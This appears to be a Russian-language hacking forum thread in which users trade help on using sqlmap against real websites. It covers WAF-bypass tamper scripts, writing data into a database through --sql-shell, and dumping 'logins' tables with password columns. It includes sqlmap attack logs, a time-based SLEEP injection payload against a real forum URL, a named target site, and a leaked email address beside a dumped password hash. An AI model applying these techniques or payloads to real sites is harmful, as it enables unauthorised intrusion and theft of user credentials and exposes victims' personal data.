Попробуйте утилиту whatwav. Она определяет тип WAF и тампер(ы), который нужно использовать. Но это не факт. Попробуйте руками. Здесь на борде есть статьи как обходить WAV
Джентельмены, реально ли через sqlmap обновить поле в колонке читая текст из filename.txt используя --sql-shell? Что то типа UPDATE tablename SET textcolumn= filename.txt WHERE id=1? P.S есть ли вообще такая возможность, чтобы текст со своего файла туда залить и как такой запрос должен выглядить
Если SELECT, то обновить можно при условии запроса в бд через mysqli_multi_query или PDO::query. Или тип бд mssql. Если INSERT, то можно обновить поле при наличии PRIMARY KEY в таблице. https://dev.mysql.com/doc/refman/8.0/en/insert-on-duplicate.html В SET textcolumn = 'содержимое filename.txt'
sqlmap генерирует свой префикс и суффикс. Если использовался при раскрутке, то укзать через --prefix --suffix. https://github.com/sqlmapproject/sqlmap/wiki/Usage
скуля в юнион мускул(MariaDB fork) проблема с кодировкой password (blob) вид:| Linkinsgirl69@yahoo.com | G/\x12\\?ЦУ?дЬЧП?XP_ | 2 | попробывал выводить с --binary-fields=password , c --hex , вид не меняется . Есть ли способы вытащить пароль в нормальном виде?
хм... случайно не так --common-column. Даже не знаю что можно сделать, если только в аски вытаскивать,дальше декодировать...
Помогите крутануть [21:12:05] [INFO] Host parameter 'Host' appears to be 'MySQL OR time-based blind (ELT - comment)' injectable [21:36:03] [INFO] heuristic (XSS) test shows that GET parameter 'call' might be vulnerable to cross-site scripting (XSS) attacks Spoiler: site http://wiki.timezero.ru/lib/exe/ajax.php?call=1
доброго времени суток. знаем, что в параметре blind-inj: при AND 1=1 - выводит Access Denied, при AND 1=0 - обычная страница. sqlmap не видит её, лишь что ему access denied выдают. как ему намекнуть что это верный возврат? WAF: KONA Security Solutions (Akamai Technologies) -- ответ: --code=403 -- что не помогло в случае с данной WAF
Помогите разобраться, постоянно прости токен при запуске, конкретно по этой ссылке, при этом через Sqli Dumper. база сливается спокойно, но криво. https://paste.pics/5EOE3 Как с этим бороться? GET parameter 'carttoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? и чтобы не выбрал по итогу: Spoiler: КОД [13:42:18] [INFO] testing connection to the target URL [13:42:25] [INFO] heuristics detected web page charset 'ISO-8859-2' [13:42:25] [INFO] testing if the target URL content is stable [13:42:32] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] с [13:42:43] [INFO] ignoring GET parameter 'carttoken' [13:42:43] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent' [*] ending @ 13:42:43 /2019-04-27/ 'action' is not recognized as an internal or external command, operable program or batch file. 'ItemID' is not recognized as an internal or external command, operable program or batch file. 'category' is not recognized as an internal or external command, operable program or batch file. 'viewby' is not recognized as an internal or external command, operable program or batch file. 'sortorder' is not recognized as an internal or external command, operable program or batch file. исход всегда один и тот же. Просто я понять не могу, везде про csrf и anti-csrf пишут и показывают, речь идет о входа куда либо (usernameassword) А это обычная страница с описанием товара. токен она отсылает, а где взять anti-csrf - ума не приложу.
Да, так и естьб поменял параметр на другой, и все стало впорядке, теперь возникла другая проблема. При попытке дампа нужных мне строк, выдает вот такое: Spoiler: code [WARNING] unable to retrieve the entries of columns 'EmailAddress, Password, Permissions, Username' for table 'logins' in database 'БЛАБЛАБЛА' (permission denied) [22:36:01] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 1 times [22:36:01] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF) Как это обойти?
Вот все, что выдает Spoiler </td> </tr> <tr> <td class="struct">RAW_TRACE</td> <td> at cfindex2ecfm1932376464.runPage(C:\home\БЛАБЛАБЛА\wwwroot\index.cfm:86) </td> </tr> <tr> <td class="struct">TEMPLATE</td> <td> C:\home\БЛАБЛАБЛА\wwwroot\index.cfm </td> </tr> <tr> <td class="struct">TYPE</td> <td> CFML </td> </tr> </table> </td></tr> </table> </td> </tr> <tr> <th>Token:</th> <td>0</td> </table> [00:07:59] [WARNING] unable to retrieve the entries of columns 'EmailAddress' for table 'logins' in database 'БЛАБЛАБЛА' (permission denied) [00:07:59] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 2 times [00:07:59] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
Доброго времени суток. Имеется вот такой результат со сканера: www.site/forum/topic/16369/vilket-ar-sexigast-att-spruta-inuti-eller-pa + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*//page/ Подскажите как правильно составить запрос для sqlmap